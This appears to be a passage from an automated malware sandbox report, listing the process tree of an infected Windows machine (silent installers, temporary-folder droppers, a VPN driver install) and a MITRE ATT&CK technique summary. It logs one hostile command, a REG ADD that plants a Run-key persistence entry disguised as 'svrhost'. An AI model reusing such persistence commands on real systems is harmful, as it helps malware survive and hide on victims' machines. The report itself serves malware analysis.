"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:4440

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:6116

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding F5AF6F613023CCD8E85775045572A85A C
2⤵
PID:5640

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding B73947015C102CAB78E0E75B4E450B07
2⤵
PID:5600

C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"
2⤵
PID:8328

C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=756 -BF=default -uncf=default
3⤵
PID:5632

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:2088

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:4556

C:\Users\Admin\AppData\Local\Temp\is-RG8AJ.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-RG8AJ.tmp\vict.tmp" /SL5="$3045A,870426,780800,C:\Users\Admin\AppData\Local\Temp\ww35ddgplyu\vict.exe" /VERYSILENT /id=535
1⤵
PID:6684

C:\Users\Admin\AppData\Local\Temp\is-TGGOH.tmp\win1host.exe
"C:\Users\Admin\AppData\Local\Temp\is-TGGOH.tmp\win1host.exe" 535
2⤵
PID:4996

C:\Users\Admin\AppData\Local\Temp\9okkyYBAu.exe
"C:\Users\Admin\AppData\Local\Temp\9okkyYBAu.exe"
3⤵
- Modifies Internet Explorer settings
PID:4100

C:\Users\Admin\AppData\Local\Temp\9okkyYBAu.exe
"C:\Users\Admin\AppData\Local\Temp\9okkyYBAu.exe"
4⤵
PID:5748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4996 -s 632
3⤵
- Program crash
PID:6072

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6716

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6976

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
1⤵
PID:5956

C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{2224ff5b-2da3-7e49-bc86-4d22380c4f59}\oemvista.inf" "9" "4d14a44ff" "0000000000000140" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"
2⤵
PID:3784

C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000140"
2⤵
PID:204

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
PID:6528

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
1⤵
PID:5260

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
1⤵
PID:1688

C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
MaskVPNUpdate.exe /silent
2⤵
PID:3696

C:\Users\Admin\AppData\Local\Temp\E055.exe
C:\Users\Admin\AppData\Local\Temp\E055.exe
1⤵
PID:4960

C:\Users\Admin\AppData\Local\Temp\E528.exe
C:\Users\Admin\AppData\Local\Temp\E528.exe
1⤵
PID:2476

C:\Users\Admin\AppData\Local\Temp\F882.exe
C:\Users\Admin\AppData\Local\Temp\F882.exe
1⤵
PID:7084

C:\Users\Admin\AppData\Local\Temp\1581.exe
C:\Users\Admin\AppData\Local\Temp\1581.exe
1⤵
PID:6680

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "svrhost" /t REG_SZ /d "C:\Users\Admin\AppData\Local\svrhost.exe"
2⤵
PID:7888

C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "svrhost" /t REG_SZ /d "C:\Users\Admin\AppData\Local\svrhost.exe"
3⤵
PID:8472

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:7108

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:6728

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5840

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:7196

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:7268

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:7392

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:7408

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:7732

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:7924

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:8160

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:7344

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:1960

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Software Discovery

T1518

Query Registry

System Information Discovery